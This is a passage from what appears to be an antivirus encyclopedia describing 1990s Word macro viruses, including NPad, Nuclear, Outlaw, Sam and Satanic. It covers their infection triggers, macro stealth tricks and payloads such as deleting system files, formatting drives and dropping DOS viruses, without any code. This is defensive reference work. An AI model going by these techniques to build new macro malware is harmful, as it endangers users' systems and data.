  23230. Date of origin: 1996
  23231. Destructive: No
  23232. Seen In-The-Wild: No
  23233. Description:
  23234.  
  23235. The only difference between this new variant and previous
  23236. NPad viruses is that NPad.Q has some minor code modifications and a
  23237. corrupted payload.
  23238.  
  23239. As a result of the corruption, NPad.Q only executes some of its
  23240. virus codes. Infection of the global template and further
  23241. documents still works, yet NPad.Q never displays the scrolling
  23242. message from the original NPad.A virus.
  23243.  
  23244.  
  23245. [Word_NPad.R]
  23246. Virus name: Word.NPad.R
  23247. Virus Type: Word macro virus
  23248. Number of macros: 1
  23249. Encrypted: Yes
  23250. Macro names: AutoOpen
  23251. Size of macros: 1831 Bytes
  23252. Place of origin: Unknown
  23253. Date of origin: 1996
  23254. Destructive: No
  23255. Seen In-The-Wild: No
  23256. Description:
  23257.  
  23258. The only difference between this new variant and previous
  23259. NPad viruses is that NPad.R has some minor code
  23260. modifications and a corrupted payload.
  23261.  
  23262. As a result of the corruption, NPad.Q only executes some of its
  23263. virus codes. Infection of the global template and further
  23264. documents still works, yet NPad.R never displays the scrolling
  23265. message from the original NPad.A virus.
  23266.  
  23267.  
  23268. [Word_NPad.S]
  23269. Virus name: Word.NPad.S
  23270. Virus Type: Word macro virus
  23271. Number of macros: 1
  23272. Encrypted: Yes
  23273. Macro names: AutoOpen
  23274. Size of macros: 1831 Bytes
  23275. Place of origin: Unknown
  23276. Date of origin: 1996
  23277. Destructive: No
  23278. Seen In-The-Wild: No
  23279. Description:
  23280.  
  23281. The only difference between this new variant and previous
  23282. NPad viruses is that NPad.S has some minor code modifications.
  23283.  
  23284. NPad.S modifies the "compatibility" section inside the WIN.INI
  23285. file. It adds a counter under the name of "NPAD328" and each
  23286. time the virus is activated, it increments this counter. Upon reaching
  23287. a value of 23 it resets the counter and displays the following
  23288. message in the status bar:
  23289.  
  23290. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  23291.  
  23292. It infects the global template when an infected document is
  23293. opened.  Further documents become infected when they are
  23294. also opened (AutoOpen).
  23295.  
  23296.  
  23297. [Word_NPad.T]
  23298. Virus name: Word.NPad.T
  23299. Virus Type: Word macro virus
  23300. Number of macros: 1
  23301. Encrypted: Yes
  23302. Macro names: AutoOpen
  23303. Size of macros: 1831 Bytes
  23304. Place of origin: Unknown
  23305. Date of origin: 1996
  23306. Destructive: No
  23307. Seen In-The-Wild: No
  23308. Description:
  23309.  
  23310. The only difference between this new variant and previous
  23311. NPad viruses is that NPad.T has some minor code
  23312. modifications and a corrupted payload.
  23313.  
  23314. As a result of the corruption, NPad.T only executes some of its
  23315. virus codes. Infection of the global template and further
  23316. documents still works, yet NPad.T never displays the scrolling
  23317. message from the original NPad.A virus.
  23318.  
  23319.  
  23320. [Word_NPad.U]
  23321. Virus name: Word.NPad.U
  23322. Virus Type: Word macro virus
  23323. Number of macros: 1
  23324. Encrypted: Yes
  23325. Macro names: AutoOpen
  23326. Size of macros: 1831 Bytes
  23327. Place of origin: Unknown
  23328. Date of origin: 1996
  23329. Destructive: No
  23330. Seen In-The-Wild: No
  23331. Description:
  23332.  
  23333. The only difference between this new variant and previous
  23334. NPad viruses is that NPad.U has some minor code modifications.
  23335.  
  23336. NPad.U modifies the "compatibility" section inside the WIN.INI
  23337. file. It adds a counter under the name of "NPAD328" and each
  23338. time the virus is activated, it adds 1 to the counter. Upon reaching
  23339. a value of 23 it resets the counter and displays the following
  23340. message in the status bar:
  23341.  
  23342. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  23343.  
  23344. It infects the global template when an infected document is
  23345. opened. Further documents become infected when they are
  23346. also opened (AutoOpen).
  23347.  
  23348.  
  23349. [Word_NPad.V]
  23350. Virus name: Word.NPad.V
  23351. Virus Type: Word macro virus
  23352. Number of macros: 1
  23353. Encrypted: Yes
  23354. Macro names: AutoOpen
  23355. Size of macros: 1831 Bytes
  23356. Place of origin: Unknown
  23357. Date of origin: 1996
  23358. Destructive: No
  23359. Seen In-The-Wild: No
  23360. Description:
  23361.  
  23362. The only difference between this new variant and previous
  23363. NPad viruses is that NPad.V has some minor code
  23364. modifications and a corrupted payload.
  23365.  
  23366. As a result of the corruption, NPad.V only executes some of its
  23367. virus codes. Infection of the global template and further
  23368. documents still works, yet NPad.V never displays the scrolling
  23369. message from the original NPad.A virus.
  23370.  
  23371.  
  23372. [Word_NPad.W]
  23373. Virus name: Word.NPad.W
  23374. Virus Type: Word macro virus
  23375. Number of macros: 1
  23376. Encrypted: Yes
  23377. Macro names: AutoOpen
  23378. Size of macros: 1831 Bytes
  23379. Place of origin: Unknown
  23380. Date of origin: 1996
  23381. Destructive: No
  23382. Seen In-The-Wild: No
  23383. Description:
  23384.  
  23385. The only difference between this new variant and previous
  23386. NPad viruses is that NPad.W has some minor code
  23387. modifications and a corrupted payload.
  23388.  
  23389. As a result of the corruption, NPad.W only executes some of its
  23390. virus codes. Infection of the global template and further
  23391. documents still works, yet NPad.W never displays the scrolling
  23392. message from the original NPad.A virus.
  23393.  
  23394.  
  23395. [Word_NPad.X]
  23396. Virus name: Word.NPad.X
  23397. Virus Type: Word macro virus
  23398. Number of macros: 1
  23399. Encrypted: Yes
  23400. Macro names: AutoOpen
  23401. Size of macros: 1831 Bytes
  23402. Place of origin: Unknown
  23403. Date of origin: 1996
  23404. Destructive: No
  23405. Seen In-The-Wild: No
  23406. Description:
  23407.  
  23408. The only difference between this new variant and previous
  23409. NPad viruses is that NPad.X has some minor code
  23410. modifications and a corrupted payload.
  23411.  
  23412. As a result of the corruption, NPad.X only executes some of its
  23413. virus codes. Infection of the global template and further
  23414. documents still works, yet NPad.X never displays the scrolling
  23415. message from the original NPad.A virus.
  23416.  
  23417.  
  23418. [Word_NPad.Y]
  23419. Virus name: Word.NPad.Y
  23420. Virus Type: Word macro virus
  23421. Number of macros: 1
  23422. Encrypted: Yes
  23423. Macro names: AutoOpen
  23424. Size of macros: 1831 Bytes
  23425. Place of origin: Unknown
  23426. Date of origin: 1996
  23427. Destructive: No
  23428. Seen In-The-Wild: No
  23429. Description:
  23430.  
  23431. The only difference between this new variant and previous
  23432. NPad viruses is that NPad.Y has some minor code
  23433. modifications and a corrupted payload.
  23434.  
  23435. As a result of the corruption, NPad.Y only executes some of its
  23436. virus codes. Infection of the global template and further
  23437. documents still works, yet NPad.Y never displays the scrolling
  23438. message from the original NPad.A virus.
  23439.  
  23440.  
  23441. [Word_NPad.Z]
  23442. Virus name: Word.NPad.Z
  23443. Virus Type: Word macro virus
  23444. Number of macros: 1
  23445. Encrypted: Yes
  23446. Macro names: AutoOpen
  23447. Size of macros: 1831 Bytes
  23448. Place of origin: Unknown
  23449. Date of origin: 1996
  23450. Destructive: No
  23451. Seen In-The-Wild: No
  23452. Description:
  23453.  
  23454. The only difference between this new variant and previous
  23455. NPad viruses is that NPad.Z has some minor code
  23456. modifications and a corrupted payload.
  23457.  
  23458. As a result of the corruption, NPad.Z only executes some of its
  23459. virus codes. Infection of the global template and further
  23460. documents still works, yet NPad.Z never displays the scrolling
  23461. message from the original NPad.A virus.
  23462.  
  23463.  
  23464. [Word_Nuclear.A(a.k.a. Alert)]
  23465. Virus name: Word.Nuclear.A (a.k.a. Alert)
  23466. Virus Type: Word macro virus
  23467. Number of macros: 9
  23468. Encrypted: Yes
  23469. Macro names: AutoExec, AutoOpen, DropSuriv, FileExit, FilePrint,
  23470.              FilePrintDefault, FileSaveAs, InsertPayload, Payload
  23471. Size of macros: 10556 Bytes
  23472. Place of origin: Australia
  23473. Date of origin: September 1995
  23474. Destructive: Yes
  23475. Common In-The-Wild: Yes
  23476. Description:
  23477.  
  23478. Nuclear was the second macro virus found "In-the-Wild" (after
  23479. Concept). It was distributed, over the Internet in a document
  23480. with information about the Concept virus. It was also the first
  23481. macro virus that uses Execute-Only (encrypted) macros to
  23482. make analysis more difficult.
  23483.  
  23484. Nuclear is activated with the "AutoExec" and "AutoOpen"
  23485. macros. Before it infects the global template (normal.dot), it
  23486. checks for a previous infection. It does not infect if it finds
  23487. the "AutoExec" macro.  Documents become infected when
  23488. they are saved with the "FileSaveAs" command.
  23489.  
  23490. After the virus macros have been transferred to the global
  23491. template,  Nuclear calls some destructive payloads. The first
  23492. payload tries to drop the "Ph33r" virus. Between 17:00 and
  23493. 17:59, Nuclear creates a text file including a script of the
  23494. DOS/Windows-EXE virus "Ph33r".  It then uses the DOS
  23495. command "DEBUG.EXE" to convert the file into an
  23496. executable file. It also creates the "EXEC_PH.BAT" batch file,
  23497. and calls it via a Dos shell. This last infection routine is faulty,
  23498. the DOS-window is closed immediately, and the "Ph33r" virus
  23499. never infects the system.
  23500.  
  23501. The second payload, upon printing a document, Nuclear
  23502. checks the system time and in case of a value larger than 55
  23503. in the seconds field, it adds the following text at the end of
  23504. the printed document:
  23505.  
  23506. "   And finally I would like to say:   "
  23507.  
  23508. "   STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC   "
  23509.  
  23510. The third destructive payload is activated on April 5, when
  23511. Nuclear deletes the system files "C:\IO.SYS", "C:\MSDOS.SYS" and
  23512. "C:\COMMAND.COM.
  23513.  
  23514. This leaves the computer unbootable.
  23515.  
  23516.  
  23517. [Word_Nuclear.B]
  23518. Virus name: Word.Nuclear.B
  23519. Virus Type: Word macro virus
  23520. Number of macros: 7
  23521. Encrypted: Yes
  23522. Macro names: AutoExec, AutoOpen, FilePrint, FilePrintDefault,
  23523.              FileSaveAs, InsertPayload, Payload
  23524. Size of macros: 3458 Bytes
  23525. Place of origin: France
  23526. Date of origin: March 1996
  23527. Destructive: Yes
  23528. Common In-The-Wild: Yes
  23529. Description:
  23530.  
  23531. The difference between this new variant and the Nuclear.A
  23532. virus is that Nuclear.B does not try to drop the "PH33r" virus.
  23533.  
  23534. For more information, please refer to the Nuclear.A description.
  23535.  
  23536. [Word_Outlaw.A]
  23537. Virus name: Word.Outlaw.A
  23538. Virus Type: Word macro virus
  23539. Number of macros: 3
  23540. Encrypted: No
  23541. Macro names: randomly selected
  23542. Size of macros: 21410 Bytes
  23543. Place of origin: Germany
  23544. Date of origin: September 1996
  23545. Payload: Yes
  23546. Common In-The-Wild: No
  23547. Description:
  23548.  
  23549. Outlaw has 3 unencrypted macros with a size of 21410 Bytes.
  23550.  
  23551. Each macro name consists of 5 characters made of: 2 letters (A-X)
  23552. corresponding to the hour field of the time and 4 randomly selected
  23553. numbers.
  23554.  
  23555. Outlaw redefines built-in macro commands. One macro is
  23556. associated with the letter " E " and another macro with the
  23557. "spacebar." Since both keys are very common, the probability
  23558. of an infection is very high. Outlaw is considered the first
  23559. (semi) polymorphic virus, since it changes its macro names.
  23560.  
  23561. Outlaw modifies the "Int1" section of Win.ini (Windows
  23562. directory). It puts the three random macro names under
  23563. Name=, Name1= and Name2=. This modification is used for
  23564. recognition of an already infected global template. Outlaw
  23565. does not infect the global template if the macro names,
  23566. mentioned in Win.ini (Name=xxxxxx), already exist.
  23567.  
  23568. It also modifies the following 3 document variables:
  23569.  
  23570. VirName
  23571. VirNameDoc
  23572. VirNamePayload
  23573.  
  23574. Outlaw.A does not infect a document if the value of the
  23575. VirNameDoc variable already exists in a document.
  23576.  
  23577. Upon infection of a document on January 20, Outlaw
  23578. launches its payload (works only under Windows 95).
  23579. It plays a laughing sound on the PC speaker and creates a
  23580. new document with the following text:
  23581.  
  23582. "   You are infected with   "
  23583.  
  23584. "   Outlaw   "
  23585.  
  23586. "   A virus from Nightmare Joker.   "
  23587.  
  23588.  
  23589. [Word_Outlaw.B]
  23590. Virus name: Word.Outlaw.B
  23591. Virus Type: Word macro virus
  23592. Number of macros: 3
  23593. Encrypted: Yes
  23594. Macro names: randomly selected
  23595. Size of macros: 21434 Bytes
  23596. Place of origin: Germany
  23597. Date of origin: September 1996
  23598. Payload: Yes
  23599. Common In-The-Wild: No
  23600. Description:
  23601.  
  23602. The difference between this new variant and the original
  23603. Outlaw.A virus is that Outlaw.B has three encrypted macros
  23604. while the macros in Outlaw.A are unencrypted.
  23605.  
  23606. For more information, please refer to the Outlaw.A description.
  23607.  
  23608.  
  23609. [Word_Outlaw.C (a.k.a MoonRaider)]
  23610. Virus name: Word.Outlaw.C (a.k.a MoonRaider)
  23611. Virus Type: Word macro virus
  23612. Number of macros: 5
  23613. Encrypted: Yes
  23614. Macro names: Random names
  23615. Size of macros: 14806 Bytes
  23616. Place of origin: Germany
  23617. Date of origin: November 1996
  23618. Payload: Yes
  23619. Seen In-The-Wild: No
  23620. Description:
  23621.  
  23622. Outlaw.C is a combination of the Outlaw.A and Magnum
  23623. viruses. It uses assigned keys to start up its macros. One of the
  23624. macros is associated with pressing SPACE, the other with
  23625. pressing "e."
  23626.  
  23627. ToolsMacro and ExtrasMakro are the two fixed virus macros.
  23628.  
  23629. Outlaw.C replaces "Tools/Macro" and "Extras/Makro" with its
  23630. own code in order to make recognition of an infected file
  23631. more difficult (called macro stealth technique).
  23632.  
  23633. The remaining 3 macro names are randomly chosen. Each
  23634. name consists of  characters: the first 2 letters correspond to
  23635. the hour field of the infection time and the next 4 characters
  23636. are randomly selected numbers.
  23637.  
  23638. Outlaw.C stores its macro names in the document variables:
  23639. VirName, VirNameDoc, and VirNamePayLoad.
  23640. For the global template it uses the [intl] section of win.ini to
  23641. store it macro names: Name1=, Name2=, and Name3=.
  23642.  
  23643. Upon pressing the "E" key on October 10th of each year a
  23644. document with the following text is created:
  23645.  
  23646. "   You are infected with the MooNRaiDer Virus!   "
  23647. "   Greetings to all members of Vlad!   "
  23648. "   I hope that's not the end!   "
  23649. "   The scene would be to boring without this very good group!   "
  23650. "   Nightmare Joker   "
  23651.  
  23652. On any other day of the year, Outlaw.C checks the
  23653. "Goodbye" setting in the "Vlad" section of win.ini. If it is not
  23654. "Yes" then a DOS based virus (written by the Australian virus
  23655. writing group VLAD) is dropped and an extra line is added to
  23656. C:\AUTOEXEC.BAT to execute the virus.
  23657.  
  23658. The hidden filename of the DOS-based virus is "goodbye.com."
  23659.  
  23660. [Word_Oval.A]
  23661. Virus name: Word.Oval.A
  23662. Virus Type: Word macro virus
  23663. Number of macros: 1
  23664. Encrypted: Yes
  23665. Macro names: AutoOpen
  23666. Size of macros: 339 Bytes
  23667. Place of origin: Texas, USA
  23668. Date of origin: April 1997
  23669. Payload: Yes
  23670. Seen In-The-Wild: Yes
  23671. Description:
  23672.  
  23673. Oval.A infects the global template (normal.dot) when an
  23674. infected document is opened. Further documents become
  23675. infected when they are also opened (AutoOpen).
  23676.  
  23677. When Oval triggers, it changes the font size (probability of 10
  23678. percent) of the active document. It also shows the following
  23679. message in the status bar:
  23680.  
  23681. "   Be sure to drink your Ovaltine   "
  23682.  
  23683.  
  23684. [Word_Paper.A]
  23685. Virus name: Word.Paper.A
  23686. Virus Type: Word macro virus
  23687. Number of macros: 5
  23688. Encrypted: No
  23689. Macro names: mswFS, FileClose, AutoOpen, ToolsMacro,
  23690.              AutoExec, FieSave, mswFC, mswAO
  23691. Size of macros: 3608 Bytes
  23692. Place of origin: Unknown
  23693. Date of origin: Unknown
  23694. Destructive: No
  23695. Seen In-The-Wild: No
  23696. Description:
  23697.  
  23698. When Paper infects a document, or the global template, it
  23699. copies all its virus macros and then renames them. If the
  23700. "AutoOpen" and "FileClose" macros already exist in the
  23701. global template, they are deleted.  In a similar fashion, the
  23702. "FileSave" macro is deleted from documents.
  23703.  
  23704. Paper replaces the Tools/Macro option with a dummy macro in
  23705. order to make recognition of an infected file more difficult
  23706. (called macro stealth technique). If a user selects the
  23707. Tools/Macro option nothing happens.
  23708.  
  23709.  
  23710. [Word_PayCheck.A]
  23711. Virus name: Word.PayCheck.A
  23712. Virus Type: Word macro virus
  23713. Number of macros: 7
  23714. Encrypted: Yes
  23715. Macro names: AutoExec, AutoOpen, FileOpen, FileSave
  23716.              FileSaveAs, ShellOpen, ToolsMacro
  23717. Size of macros: 8489 Bytes
  23718. Place of origin: Unknown
  23719. Date of origin: Spring 1997
  23720. Payload: Yes
  23721. Common In-The-Wild: Yes
  23722. Description:
  23723.  
  23724. Paycheck infects the global template (normal.dot) when an
  23725. infected document is opened. Further documents become
  23726. infected when they are saved.
  23727.  
  23728. It uses "ToolsMacro" to make recognition of an infected
  23729. document more difficult (called macro stealth technique).
  23730.  
  23731. It also checks the system time and in case of a 25, 26, 27, 28,
  23732. 29, 30 or 31 in the day field, it displays the following message:
  23733.  
  23734. "   Sekarang adalah tanghal 25, sudahkah anda mengabil gaji?   "
  23735. "   He..he..selamat. Kalau bisa, lebih keras lagi kerjany a.   "
  23736.                "   Bravo Bukit Asam!!!   "
  23737.  
  23738. When a user saves a document between the 20th and the 31st
  23739. of each month, Paycheck displays another message:
  23740.  
  23741. "   Internal error was occurred in module UNIDRV.DLL.   "
  23742. "   Your application may not be work normally.    "
  23743. "   Please contact Microsoft Product Support.   "
  23744.  
  23745.  
  23746. [WordPhantom.A (a.k.a Teaside, Guess, HiSexy)]
  23747.  
  23748. Virus name: Word.Phantom.A (a.k.a Teaside, Guess, HiSexy)
  23749. Virus Type: Word macro virus
  23750. Number of macros: 1
  23751. Encrypted: No
  23752. Macro names: AutoOpen
  23753. Size of macros: 1126 Bytes
  23754. Place of origin: Germany
  23755. Date of origin: May 1996
  23756. Destructive: Yes
  23757. Common In-The-Wild: No
  23758. Description:
  23759.  
  23760. When an infected document is opened, Guess checks if the
  23761. document variables are set to "populated." If this is not the
  23762. case, a new global template (normal.dot) is created and the
  23763. virus macro "AutoOpen" is copied into the new document.
  23764. After that the variables are set to "populated" in order to mark
  23765. the file as "infected." If the variables are already set, the virus
  23766. infects the new document by transferring the "AutoOpen" macro using
  23767. the MakroCopy command. Guess is the first macro virus to use the
  23768. document variables as a checking mechanism for already infected
  23769. documents.
  23770.  
  23771. Because of an error inside the virus code, the virus does not
  23772. replicate properly.
  23773.  
  23774. Upon a random number (between 0 and 100), Guess activates
  23775. various destructive payloads. It changes the active font size or
  23776. creates a new document including the following text:
  23777.  
  23778. "   The word is out.   "
  23779. "   The word is spreading...   "
  23780. "   The Phantom speaks...   "
  23781. "   Sedbergh   "
  23782. "   is CRAP   "
  23783. "   The word spreads...   "
  23784.  
  23785. The text will then be printed out.
  23786.  
  23787. The following texts will be inserted into the active document
  23788. upon a calculated random number:
  23789.  
  23790. "   This school is really good.  NOT   "
  23791. "   We all love Mr. Hirst.   "
  23792. "   M.R.Beard   "
  23793. "   This network is REALLY fast.   "
  23794. "   Hi Sexy!   "
  23795. "   Who's been typing on my computer?   "
  23796. "   Well helloooo there!   "
  23797. "   Guess who?   "
  23798.  
  23799.  
  23800. [Word_Phardera.A (a.k.a. Phandera)]
  23801. Virus name: Word.Phardera.A (a.k.a. Phandera)
  23802. Virus Type: Word macro virus
  23803. Number of macros: 1
  23804. Encrypted: Yes
  23805. Macro names: FileOpen
  23806. Size of macros: 1673 Bytes
  23807. Place of origin: Batavia, Indonesia
  23808. Date of origin: July 1996
  23809. Destructive: Yes
  23810. Common In-The-Wild: No
  23811. Description:
  23812.  
  23813. Phardera activates when an infected document is opened
  23814. (FileOpen).
  23815.  
  23816. Phardera will not infect the global template or documents if
  23817. one of the following macros is already present:
  23818.  
  23819. "FileOpen"
  23820. "ToolsCustomizeMenus"
  23821. "ToolsOptionsSave"
  23822. "ToolsOptionsGeneral"
  23823.  
  23824. Phardera tries to hide its presence by removing Tools/Macro,
  23825. Tools/Customize and File/Templates from the options menu
  23826. (called macro stealth technique). This part of the virus works
  23827. only with the English version of Microsoft Word.
  23828.  
  23829. Upon infection of a document on the 13th of each month,
  23830. Phardera displays the following message:
  23831.  
  23832. "   Dianita DSR. [I Love Her!]   "
  23833.  
  23834. A second message is displayed when a document is infected
  23835. on the 31st of each month.
  23836.  
  23837. "   Phardera was here!   "
  23838.  
  23839.  
  23840. [Word_Polite.A(a.k.a. WW2Demo)]
  23841. Virus name: Word.Polite.A (a.k.a. WW2Demo)
  23842. Virus Type: Word macro virus
  23843. Number of macros: 2
  23844. Encrypted: No
  23845. Macro names: FileClose, FileSaveAs
  23846. Size of macros: 1918 Bytes
  23847. Place of origin: USA
  23848. Date of origin: March 1996
  23849. Destructive: No
  23850. Common In-The-Wild: No
  23851. Description:
  23852.  
  23853. Polite was first created with Microsoft version 2.0, yet it also
  23854. works with higher versions of Microsoft Word.
  23855.  
  23856. Polite can be called a demonstration virus and is very unlikely
  23857. to spread.  Before each infection attempt, it displays a
  23858. window with the following question:
  23859.  
  23860. "   Shall I infect the file ?   "
  23861.  
  23862. If the user answers with the "No" button, no document
  23863. gets infected.  While it asks for permission to infect files,
  23864. it does not ask for permission to infect the global template
  23865. (NORMAL.DOT).
  23866.  
  23867. Upon infection of the global template (when an infected
  23868. document is closed), Polite displays the following message:
  23869.  
  23870. "   I am alive!   "
  23871.  
  23872. Once Polite infects a Word 6.0/7.0 document it can not infect
  23873. Word 2.0 documents anymore.
  23874.  
  23875.  
  23876. [Word_Random.A (Intended)]
  23877. Virus Type: Word macro virus
  23878. Virus name: Word.Random.A (Intended)
  23879. Number of macros: 1 or more
  23880. Encrypted: No
  23881. Macro names: randomly chosen
  23882. Size of macros: 553 Bytes
  23883. Place of origin: Unknown
  23884. Date of origin: Spring 1997
  23885. Payload: No
  23886. Seen In-The-Wild: No
  23887. Description:
  23888.  
  23889. Random.A is another macro virus that does not infect
  23890. any other documents. Therefore, it is highly unlikely that
  23891. users will run into a document infected with this virus.
  23892.  
  23893.  
  23894. [Word_Randomic.A]
  23895. Virus name: Word.Randomic.A
  23896. Virus Type: Word macro virus
  23897. Number of macros: 1
  23898. Encrypted: No
  23899. Macro names: polymorphic
  23900. Size of macros: 2397 Bytes
  23901. Place of origin: Germany
  23902. Date of origin: Spring 1997
  23903. Payload: Yes
  23904. Seen In-The-Wild: No
  23905. Description:
  23906.  
  23907. Randomic infects the global template (normal.dot) when an
  23908. infected document is opened. Further documents become
  23909. infected when the user presses a randomly chosen key (which
  23910. is linked to the viral macro).
  23911.  
  23912. The two document variables that keep the name of the macro and
  23913. the key shortcuts are:
  23914.  
  23915. "   RANDOMIC   "
  23916. "   TKEY   "
  23917.  
  23918. Randomic also displays a message on April 4th and tries to exit
  23919. Windows.
  23920.  
  23921.  
  23922. [Word_Rapi.A]
  23923. Virus name: Word.Rapi.A
  23924. Virus Type: Word macro virus
  23925. Number of macros: 7 or 11 (global template)
  23926. Encrypted: No
  23927. Macro names: RpAe, RpFO, RpFS, RpTC, RpTM, RpFSA, AutoOpen
  23928. Size of macros: 6172 Bytes or 11228 Bytes
  23929. Place of origin: Indonesia
  23930. Date of origin: December 1996
  23931. Destructive: No
  23932. Common In-The-Wild: Yes
  23933. Description:
  23934.  
  23935. Rapi infects the global template when an infected document
  23936. is opened (AutoOpen). Further documents become infected
  23937. when they are opened (FileOpen) or saved (FileSave and
  23938. FileSaveAs).
  23939.  
  23940. Upon infection, Rapi displays the following message:
  23941.  
  23942. "   Thank's for joining us !   "
  23943.  
  23944. The "AutoExec" macro contains a destructive payload to
  23945. delete files, yet due to some REM's it never triggers.
  23946. However, Rapi.A drops a file (C:\BACALAH.TXT) to the root
  23947. directory.
  23948.  
  23949. The file contains the following Indonesian text:
  23950. (translated into English)
  23951.  
  23952. " Assalamualaikum..., sorry @Rapi.Kom disturbs you. This message "
  23953. " was originally called PESAN.TXT. It appears in the root directory "
  23954. " after running Word 6.0 and the global template (normal.dot) is "
  23955. " already infected by this macro. This macro virus (before the change "
  23956. " by Rapi@Kom) cam from a Word 6.0 file (*.doc) which was already "
  23957. " infected by this virus. When the file is opened (Open doc), the "
  23958. " macro automatically executes the instructions i.e. "
  23959. " copies itself to the global template (normal.dot). On a certain "
  23960. " date and time the macro will delete all files in the directory "
  23961. " levels 1, 2, and 3 (except for hidden directories........ "
  23962. " Malang (date and time of infection) @Rapi.Kom "
  23963.  
  23964. Rapi uses "ToolsMacro" and "ToolsCustomize" to make
  23965. recognition of an infected file more difficult (called macro
  23966. stealth technique). If a user selects one of the two options,
  23967. Word displays a WordBasic error message.
  23968.  
  23969. Rapi.A devolves into Rapi.A1 and Rapi.A2, which contain 6
  23970. or 3 macros (5607 Bytes or 3626 Bytes).
  23971.  
  23972. [Word_Rapi.AA2]
  23973. Virus name: Word.Rapi.AA2
  23974. Virus Type: Word macro virus
  23975. Number of macros: 3 or 5 (global template)
  23976. Encrypted: No
  23977. Macro names: RpAe, RpFS, AutoOpen
  23978. Size of macros: 4626 Bytes or 8571 Bytes (global template)
  23979. Place of origin: Unknown
  23980. Date of origin: Spring 1997
  23981. Destructive: No
  23982. Common In-The-Wild: Yes
  23983. Description:
  23984.  
  23985. Rapi.AA2 infects the global template when an infected
  23986. document is opened (AutoOpen). Further documents become
  23987. infected when they are saved (FileSave).
  23988. Rapi.AA was discovered in its last devolved form,
  23989. thus it was named Rapi.AA2.
  23990.  
  23991. The main difference between this virus and the previous Rapi viruses
  23992. is that the "RpAe" macro is corrupted.
  23993.  
  23994. Microsoft Word does not care about corrupted macros, therefore
  23995. Rapi.AA2 is still able to infect further documents.
  23996.  
  23997.  
  23998. [Word_Reflex.A (a.k.a RedDwarf)]
  23999. Virus name: Word.Reflex.A (a.k.a RedDwarf)
  24000. Virus Type: Word macro virus
  24001. Number of macros: 3 or 4
  24002. Encrypted: Yes
  24003. Macro names: AutoOpen, FClose, FileClose, FA
  24004. Size of macros: 897 Bytes in .doc files
  24005.                 1226 Bytes in global template
  24006. Place of origin: Ireland
  24007. Date of origin: Summer 1996
  24008. Destructive: No
  24009. Common In-The-Wild: No
  24010. Description:
  24011.  
  24012. An infected global template contains one more macro ("FA").
  24013. Upon infection, Reflex turns off the prompting of Word to
  24014. ensure a hidden infection of the global template (normal.dot).
  24015. Infected documents are saved with the password "Guardian."
  24016.  
  24017. Reflex was written at an anti-virus conference after an
  24018. anti-virus company announced a challenge to hackers to
  24019. break its new technology.  Any author of a new undetected
  24020. macro virus was supposed to receive champagne as a reward.
  24021.  
  24022. When Reflex infects a file it displays the following window:
  24023.  
  24024. "   Now, Where's that Jerbil of Bubbly?   "
  24025.  
  24026. [Word_Sam.A:Tw]
  24027. Virus name: Word.Sam.A:Tw
  24028. Virus Type: Word macro virus
  24029. Number of macros: 7 or 4
  24030. Encrypted: Yes
  24031. Macro names: AutoOpen, Autoexec, AutoNew, FileSaveAs (ToolsMacro,
  24032.              FileTemplates, Monday)
  24033. Size of macros: 4192 or 6082 Bytes
  24034. Place of origin: Taiwan
  24035. Date of origin: Spring 1997
  24036. Destructive: Yes
  24037. Seen In-The-Wild: No
  24038. Description:
  24039.  
  24040. Sam.A is another macro virus that only works with the
  24041. East Asian version of Microsoft Word.  Sam infects the global
  24042. template when an infected document is opened. Further
  24043. documents become infected when they are also opened,
  24044. created, or saved (FileSaveAs).
  24045.  
  24046. Sam has various destructive payloads:
  24047.  
  24048. 1. Every Monday at 10:00, Sam overwrites the AUTOEXEC.BAT
  24049.    file with commands that will format the hard disk upon
  24050.    the next boot-up.
  24051.  
  24052.    It also displays the following messages:
  24053.  
  24054.    "   Taiwan Dark Monday Today is Monday, do you work hard?   "
  24055.    "   It's tea time now! Let's go out and have some fun...    "
  24056.  
  24057. 2. On every Monday the 13th, Sam deletes all .INI file in the
  24058.    C:\WINDOWS directory and then displays the following
  24059.    message:
  24060.  
  24061.    "   It Is Dark Monday...   "
  24062.  
  24063. 3.  When FileTemplates is accessed, Sam shows the message
  24064.     "  Taiwan Dark Monday Go ahead! Make my day!!!   " and
  24065.     then replaces all text with the following:
  24066.  
  24067.     "   TAIWAN DARK MONDAY   "
  24068.  
  24069. 4.  When ToolsMacro is accessed, Sam shows the message
  24070.     "  Taiwan Dark Monday You may insert password to access
  24071.     here..." and encrypts the active document with the following
  24072.     password:
  24073.  
  24074.     "   Samuel   "
  24075.  
  24076. The document that was distributed over the Internet differs in
  24077. one of the macros (ToolsMacr instead of ToolsMacro). Due to
  24078. this macro name change, Sam.A devolves into Sam.A1
  24079. (with only 4 macros instead of 7).  Infected samples with only
  24080. 4 macros are not capable of further infecting documents.
  24081. They are classified as "intended."
  24082.  
  24083. [Word_Satanic.A]
  24084. Virus name: Word.Satanic.A
  24085. Virus Type: Word macro virus
  24086. Number of macros: 5
  24087. Encrypted: Yes
  24088. Macro names: AutoOpen, AutoClose, AutoExec, AutoExit, AutoNew
  24089. Size of macros: 53249 Bytes
  24090. Place of origin: Germany
  24091. Date of origin: Summer 1996
  24092. Destructive: Yes
  24093. Common In-The-Wild: No
  24094. Description:
  24095.  
  24096. Satanic activates when an infected document is opened
  24097. (AutoOpen).  Satanic does not infect when the "AutoExit"
  24098. macro already exists in the global template or a document.
  24099. Further documents become infected when they are created
  24100. (AutoNew), closed (AutoClose) or Microsoft Word is exited
  24101. (AutoExit).
  24102.  
  24103. Satanic deletes the Tool/Customize, Tool/Macro and
  24104. Tools/Option menu items to make recognition of an infected
  24105. document more difficult (called macro stealth technique).
  24106.  
  24107. Satanic also inserts "Installed=Yes" into the "Control" section
  24108. of win.ini. If it does not find the entry (first activation or
  24109. deletion) then it tries to drop and launch a DOS-based virus
  24110. (NC.COM).
  24111.  
  24112. Upon exiting Microsoft Word (AutoExit) on October 1st,
  24113. Satanic will format the C drive unconditionally, resulting to
  24114. a loss of valuable information.
  24115.  
  24116. A second payload will activate on September 30th. Satanic
  24117. will then display the following message:
  24118.  
  24119. "   You are infected with Satanic   "
  24120.  
  24121. [Word_Saver.A (a.k.a. SaverSex)]
  24122. Virus name: Word.Saver.A (a.k.a. SaverSex)
  24123. Virus Type: Word macro virus
  24124. Number of macros: 1
  24125. Encrypted: Yes
  24126. Macro names: DateiSpeichern
  24127. Size of macros: 602 Bytes
  24128. Place of origin: Austria
  24129. Date of origin: September 1996
  24130. Destructive: No
